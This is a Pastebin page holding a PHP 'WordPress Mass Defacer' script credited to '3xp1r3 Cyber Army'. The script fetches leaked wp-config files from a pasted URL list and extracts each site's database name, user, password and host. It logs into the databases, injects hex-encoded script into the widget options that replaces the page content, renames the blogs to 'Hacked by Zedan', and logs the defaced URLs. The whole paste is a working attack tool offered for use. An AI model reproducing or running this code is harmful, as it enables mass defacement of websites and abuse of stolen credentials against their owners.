API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 14th, 2017
955
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.83 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. * @author: FaisaL Ahmed aka rEd X
  4. * @mail: me@faialahmed.me
  5. * @Last Updated: 19 July 2015
  6. */
  7.  
  8. set_time_limit(0);
  9. ini_set('display_errors', 0);
  10.  
  11. echo '<html><head>
  12. <title>WordPress Mass Defacer | 3xp1r3 Cyber Army</title>
  13. <meta content="text/html; charset=utf-8">
  14. <meta name="keywords" content="WordPress Defacer, 3xp1r3, 3xp1r3 Cyber Army, rEd X" />
  15. <meta name="description" content="WordPress Defacer" />
  16. <meta name="author" content="rEd X" />
  17. <link rel="SHORTCUT ICON" href="http://us.yimg.com/i/mesg/emoticons7/61.gif">
  18. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
  19. <link rel="stylesheet" type="text/css" href="http://faisalahmed.me/wp-content/assets/css/1.css">
  20. </head><body>';
  21.  
  22. echo '<div style="font-family: Iceland;font-size: 35pt;text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000;color: #FFF">WordPress Mass Defacer<br><sub>3xp1r3 Cyber Army</sub></div><br/>';
  23.  
  24. echo '<form method="POST" action="" ><center><table border="1">
  25. <tr><td>Config List:</td><td><textarea name="url" cols="50" rows="10" ></textarea></td></tr>
  26. <tr><td>Deface :</td><td><textarea name="index" cols="50" rows="10" ></textarea></td></tr></table>
  27. <br><input type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
  28.  
  29. if ($_POST['action']=='1'){
  30. if ($_POST['url']==''){
  31. echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
  32. }else{
  33. $url=$_POST['url'];
  34. $users = explode("\n",$url);
  35. foreach ($users as $user) {
  36. $user1=trim($user);
  37. $code=file_get_contents2($user1);
  38. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
  39. $db=$b1[1][0];
  40. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
  41. $user=$b2[1][0];
  42. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
  43. $db_password=$b3[1][0];
  44. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
  45. $host=$b4[1][0];
  46. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
  47. $p=$b5[1][0];
  48.  
  49. $d=@mysql_connect( $host, $user, $db_password ) ;
  50. if ($d){
  51. @mysql_select_db($db );
  52. $source=stripslashes($_POST['index']);
  53. $s2=strToHex(($source));
  54. $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
  55. $ls=strlen($s)-2;
  56. $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
  57. mysql_query($sql) ;
  58. $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
  59. mysql_query($sql) ;
  60. if (function_exists("mb_convert_encoding") )
  61. {
  62. $source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
  63. $source2=mysql_real_escape_string($source2);
  64. $sql = "UPDATE `".$p."options` SET `option_value` = 'Hacked by Zedan' WHERE `option_name` = 'blogname';"; // Change rEd X to your Nick
  65. @mysql_query($sql) ; ;
  66. $sql = "UPDATE `".$p."options` SET `option_value` = 'Was Here' WHERE `option_name` = 'blogdescription';"; // Change rEd X to your Nick
  67. @mysql_query($sql) ; ;
  68. $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
  69. @mysql_query($sql) ; ;
  70. }
  71. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
  72. $siteurl=@mysql_fetch_array($aa) ;
  73. $siteurl=$siteurl['option_value'];
  74. $tr.="$siteurl\n";
  75. mysql_close();
  76. }
  77. }
  78. if ($tr)
  79. $filename = 'list.txt';
  80. $fp = fopen($filename, "a+");
  81. $write = fputs($fp, $tr);
  82. fclose($fp);
  83. echo "<div class='result'>Defacing Completed ! :)<br><br>";
  84. echo "<a href='list.txt' target='_blank'>View List of Defaced Sites</a></div><br/>";
  85. //echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
  86. }
  87. }
  88.  
  89. function strToHex($string)
  90. {
  91. $hex='';
  92. for ($i=0; $i < strlen($string); $i++)
  93. {
  94. if (strlen(dechex(ord($string[$i])))==1){
  95. $hex .="%0". dechex(ord($string[$i]));
  96. }
  97. else
  98. {
  99. $hex .="%". dechex(ord($string[$i]));
  100. }
  101. }
  102. return $hex;
  103. }
  104.  
  105. function file_get_contents2($u){
  106.  
  107. $ch = curl_init();
  108. curl_setopt($ch,CURLOPT_URL,$u);
  109. curl_setopt($ch, CURLOPT_HEADER, 0);
  110. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  111. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
  112. $result = curl_exec($ch);
  113. return $result ;
  114. }
  115. echo "<br><br>&#169; rEd X | 3xp1r3 Cyber Army";
  116. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!